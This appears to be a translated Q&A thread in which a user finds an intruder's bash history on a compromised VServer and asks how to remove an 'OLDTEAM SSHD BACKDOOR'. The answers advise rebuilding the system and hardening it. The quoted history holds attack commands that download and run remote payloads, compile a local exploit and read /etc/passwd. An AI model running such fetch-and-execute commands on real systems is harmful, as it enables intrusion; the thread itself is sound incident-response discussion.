Ditemukan SSH Backdoor di VServer. Melakukan apa?

24

Kemarin saya memeriksa histori perintah saya pada VServer saya. Saya menemukan beberapa garis yang mencurigakan.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Terutama sniffer.tgz yang mengejutkan saya. Saya membuat mesin virtual dan mengunduh arsip tgz ini. Saya memulai pengaturan dan memberi saya baris ini:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Adakah yang tahu cara menghapus ini?

itskajo
sumber

Jawaban:

66

Inilah yang harus Anda lakukan pada semua sistem yang sudah Anda gunakan ini sniffer.tgz: Nuke Them From Orbit segera , dan mulai lagi dari instalasi bersih. (Yaitu, hancurkan sistem, instal ulang bersih, muat data dari cadangan bersih - dengan asumsi Anda memiliki cadangan yang bersih, dan kemudian mengeraskan sistem sebelum memasukkannya kembali ke Internet).

Setiap kali Anda memiliki malware atau peretas masuk ke sistem Anda seperti ini, saatnya untuk menganalisis ulang bagaimana sistem Anda dikonfigurasi dan pastikan untuk tidak mengulangi langkah yang sama dengan yang mereka lakukan. Tetapi, karena ini mungkin bukan sistem Anda memiliki kemampuan untuk menyisihkan dan menganalisis forensik, dan karena ini mungkin satu-satunya server Anda, saatnya untuk hanya menghancurkan sistem virtual, dan memulai dari awal lagi (seperti yang saya katakan di atas).

(Dan ini berlaku untuk situasi seperti itu di mana Anda mendapatkan malware pada sistem. Kecuali jika Anda memiliki perangkat keras cadangan untuk mengganti sesuatu seperti ini sehingga Anda dapat mengisolasi dan secara forensik memeriksa sistem yang dilanggar, yang biasanya tidak dimiliki sebagian besar pengguna, Anda tidak punya pilihan selain untuk nuke sistem dan mulai dari awal.)

Tanpa menganalisis server Anda, saya tidak bisa mengatakan apa yang Anda lakukan salah, tetapi kemungkinan backdoor ini lebih dalam di sistem daripada sekadar 'program' sederhana yang terinstal. Dan, karena penjahat sudah menginstal backdoor di sistem Anda, Anda dapat mengasumsikan bahwa semua kata sandi Anda sekarang dilanggar dan tidak lagi aman (apakah itu untuk SSH, atau root MySQL, atau jenis kata sandi lain apa pun yang pernah telah dimasukkan ke dalam sistem komputer ini). Saatnya mengubah semua kata sandi Anda!


Setelah Anda membuat cadangan di lingkungan yang bersih, berikut adalah beberapa tips dasar tentang langkah-langkah pengerasan untuk dipertimbangkan. Perhatikan bahwa karena ini menjadikannya topik yang jauh lebih luas, saya tidak dapat menggali detail di sini, tapi ini saatnya untuk melakukan beberapa langkah pengerasan untuk melindungi sistem Anda:

  1. Nyalakan firewall , dan hanya izinkan akses ke port yang perlu dibuka . ufwada untuk menjadi sederhana, jadi mari kita gunakan itu. sudo ufw enable. (Mengkonfigurasi ufwdengan benar untuk lingkungan Anda adalah cerita yang berbeda, dan itu melampaui batas-batas pertanyaan ini.)

  2. Batasi akses ke SSH jarak jauh . Ini tidak selalu bisa dilakukan, tetapi Anda idealnya mengidentifikasi alamat IP yang dimiliki oleh Anda dan secara khusus memasukkannya dalam firewall. (Jika Anda menggunakan alamat IP perumahan dinamis lewati langkah ini).

  3. Kunci akses SSH ke server Anda , dan hanya perlu menggunakan kunci SSH untuk otentikasi . Dengan cara ini peretas tidak dapat menyerang server Anda dan mencoba dan hanya menebak kata sandi. Jauh lebih sulit untuk menebak kunci privat yang tepat (karena Anda harus memaksa mereka semua), dan ini membantu melindungi terhadap serangan bruteforcing.

  4. Jika Anda menjalankan situs web, pastikan untuk mengunci izin sehingga orang tidak dapat mengunggah / mengeksekusi hal-hal sesuka mereka . Melakukan ini bervariasi dari satu situs ke situs lainnya, jadi saya tidak dapat memberikan Anda panduan lebih lanjut di sini (tidak mungkin untuk melakukannya).

  5. Juga jika Anda menjalankan situs web menggunakan Joomla atau Wordpress atau semacamnya, pastikan Anda menjaga lingkungan tetap mutakhir dan ditambal dengan kerentanan keamanan dari penyedia perangkat lunak .

  6. Jika memungkinkan, atur, konfigurasikan, dan gunakan metode otentikasi dua faktor (2FA) untuk hal-hal yang Anda otentikasi . Ada banyak solusi untuk otentikasi faktor kedua untuk aplikasi yang berbeda, dan mengamankan berbagai aplikasi dengan cara ini berada di luar cakupan posting ini, jadi Anda harus melakukan riset tentang hal ini sebelum Anda memilih solusi.

  7. Jika Anda benar-benar harus menggunakan kata sandi dalam pengaturan Anda, gunakan pengelola kata sandi yang layak (yang berbasis cloud tidak selalu merupakan pilihan yang baik) dan gunakan kata sandi yang panjang (25+ karakter), kata sandi acak dan tidak dapat dihapus yang berbeda untuk setiap item yang sedang dibuat. diamankan dengan kata sandi (karenanya direkomendasikan untuk pengelola kata sandi). (Namun, Anda harus sangat mempertimbangkan TIDAK menggunakan kata sandi jika memungkinkan (seperti untuk otentikasi SSH), dan menggunakan 2FA jika memungkinkan).

Thomas Ward
sumber
Komentar bukan untuk diskusi panjang; percakapan ini telah dipindahkan ke obrolan .
terdon
Saya menerima jawabannya, karena inilah yang akan saya lakukan. Namun saya mencoba untuk menutup Backdoor di VM, hanya untuk kepentingan pribadi saya.
itskajo
0

Jika ada satu pintu belakang ada 3 lagi. Mengisolasi, mencadangkan data, menyimpannya, dan mengembalikan data dengan hati-hati. Berhati-hatilah dengan data cron, php, atau bahkan mysql, semuanya dapat dikompromikan. Ingat pada saat ini mereka memiliki semua kata sandi dan hash Anda, jadi jika Anda mesin lain yang juga dikonfigurasi, mereka mungkin juga meretasnya ... Bagian yang sulit adalah mencari tahu bagaimana mereka masuk untuk memulainya. Jika Anda memiliki WordPress mencari malware di plugin / tema dll ... Periksa izin Anda, Anda mungkin memiliki 777 di mana-mana. Tidak ada jawaban sederhana, Anda sedang melihat banyak pekerjaan.

tony lester
sumber
Tidak perlu lebih dari satu, namun sering atau mungkin itu mungkin tidak terjadi di sini. Dan mereka mungkin tidak memiliki semua kata sandi mereka dengan pasti. Juga bukan "kemungkinan" mereka telah meretas mesin lain, Anda tidak tahu niat mereka atau apa yang mengendus, atau jika program yang buruk bahkan diaktifkan di luar kehadiran atau berlari dengan cara tertentu. Dan "mengembalikan data dengan hati-hati" adalah saran yang sangat umum untuk sesuatu yang membutuhkan tindakan yang sangat teliti.
James